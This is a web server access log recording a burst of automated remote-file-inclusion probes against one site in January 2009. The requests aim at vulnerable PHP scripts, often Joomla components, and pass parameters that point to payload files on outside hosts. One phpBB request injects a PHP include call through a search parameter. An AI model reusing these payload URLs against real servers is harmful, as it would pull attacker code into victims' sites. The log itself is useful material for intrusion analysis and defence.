211.189.26.109 - - [04/Jan/2009:08:37:08 -0800] "GET /logs/access_081129.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:37:09 -0800] "GET //canal.php?meio=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:10 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:08:37:11 -0800] "GET /logs/access_081108.log//index.php?DOCUMENT_ROOT=http://www.amp.gob.pa/bot/idow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:37:14 -0800] "GET /logs/access_081201.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.217.172.130 - - [04/Jan/2009:08:37:16 -0800] "GET /logs/access_080213.log/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:20 -0800] "GET /logs/access_081129.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:20 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:27 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:37:27 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:29 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:30 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:37:30 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:31 -0800] "GET /logs/access_081129.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:35 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:36 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:36 -0800] "GET /logs/access_081129.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:37 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:37 -0800] "GET /logs/access_081129.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:39 -0800] "GET /logs/access_081129.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:37:40 -0800] "GET /logs/access_081129.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:37:42 -0800] "GET /logs/access_081129.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:44 -0800] "GET /logs/access_081129.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:44 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:44 -0800] "GET /logs/access_081129.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:44 -0800] "GET /logs/access_081129.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:44 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:44 -0800] "GET /logs/access_081129.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:37:45 -0800] "GET /logs/access_081129.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:46 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:46 -0800] "GET /logs/access_081129.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:37:46 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:37:47 -0800] "GET /logs/access_080729.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:48 -0800] "GET /logs/access_081129.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.198.92.34 - - [04/Jan/2009:08:37:53 -0800] "GET /logs/access_080510.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
200.198.92.34 - - [04/Jan/2009:08:37:53 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
200.198.92.34 - - [04/Jan/2009:08:37:54 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 200 95064 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:59 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.26.109 - - [04/Jan/2009:08:37:59 -0800] "GET /logs/access_081129.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:38:00 -0800] "GET /logs/access_081129.log/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:38:06 -0800] "GET /logs/access_080530.log///classes/adodbt/sql.php?classes_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:38:06 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:38:07 -0800] "GET /logs///classes/adodbt/sql.php?classes_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:38:07 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:38:09 -0800] "GET /logs/access_080410.log///classes/adodbt/sql.php?classes_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:38:10 -0800] "GET /logs/access_081129.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:38:10 -0800] "GET /logs/scripts.log/index.php3?id=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.222.22.156 - - [04/Jan/2009:08:38:12 -0800] "GET /logs/scripts.log/index.php3?id=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:08:38:14 -0800] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:08:38:14 -0800] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:08:38:14 -0800] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [04/Jan/2009:08:38:22 -0800] "GET /logs/access_080521.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.csjh.tpc.edu.tw/~sw/board/idbr.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:38:27 -0800] "GET /logs///calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:38:28 -0800] "GET //calendar.php?p=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:38:28 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:38:28 -0800] "GET /logs/access_081129.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:38:28 -0800] "GET /logs/access_081129.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:38:30 -0800] "GET /logs/access_080729.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.189.119.79 - - [04/Jan/2009:08:38:30 -0800] "GET /logs/access_081129.log%20%20/?_zb_path=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:38:36 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
59.120.3.108 - - [04/Jan/2009:08:38:42 -0800] "GET /logs/access_080516.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:38:50 -0800] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://viparenda.ru/includes/images/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:38:50 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://viparenda.ru/includes/images/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:38:50 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://viparenda.ru/includes/images/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.51.146 - - [04/Jan/2009:08:38:52 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.amp.gob.pa/bot/idow.txt??? HTTP/1.1" 200 94789 "-" "libwww-perl/5.803" "www.dmulk.com"
66.160.185.20 - - [04/Jan/2009:08:38:59 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.160.185.20 - - [04/Jan/2009:08:38:59 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:39:20 -0800] "GET /logs/access_080312.log///admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:39:20 -0800] "GET //admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:39:21 -0800] "GET /logs///admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.128.163.42 - - [04/Jan/2009:08:39:29 -0800] "GET /logs/access_080510.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.128.163.42 - - [04/Jan/2009:08:39:30 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 200 95092 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:39:30 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:39:30 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:39:30 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:39:30 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:39:31 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:39:31 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
190.128.163.42 - - [04/Jan/2009:08:39:31 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.198.92.34 - - [04/Jan/2009:08:39:31 -0800] "GET /logs/access_081125.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.caverna.kit.net/z1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:39:56 -0800] "GET /logs///classes/adodbt/sql.php?classes_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:39:57 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:40:00 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:08:40:12 -0800] "GET /logs/access_080928.log/index.php?base_dir=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.7 - - [04/Jan/2009:08:40:12 -0800] "GET /logs/access_080929.log//modules/vwar/admin/admin.php?vwar_root=http://viparenda.ru/includes/images/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:08:40:12 -0800] "GET /logs/index.php?base_dir=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:40:13 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:40:13 -0800] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:40:13 -0800] "GET /logs/access_081113.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:40:13 -0800] "GET /logs/access_080930.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
190.128.163.42 - - [04/Jan/2009:08:40:16 -0800] "GET /logs/access_081125.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://spotlyrics.com/db/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:40:17 -0800] "GET /logs/access_080426.log//index.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:40:17 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/budisirna/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:40:18 -0800] "GET /index.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 200 94873 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:40:19 -0800] "GET /logs//index.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:40:34 -0800] "GET /logs/access_081114.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:40:35 -0800] "GET /logs/access_081118.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:40:35 -0800] "GET /logs/access_081114.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:40:35 -0800] "GET /logs/access_081118.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:40:37 -0800] "GET /logs/access_080914.log//index.php?DOCUMENT_ROOT=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:40:39 -0800] "GET /index.php?DOCUMENT_ROOT=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 200 95030 "-" "libwww-perl/5.808" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:40:45 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:40:46 -0800] "GET /logs/errors.php?error=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:40:46 -0800] "GET /errors.php?error=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:40:47 -0800] "GET /logs/errors.php?error=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:40:47 -0800] "GET /errors.php?error=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:40:48 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:40:49 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.97.89 - - [04/Jan/2009:08:40:52 -0800] "GET /logs/access_080331.log//index.php?mosConfig_absolute_path=http://www.superxip2.110mb.com/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:40:58 -0800] "GET /logs/access_080507.log///admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
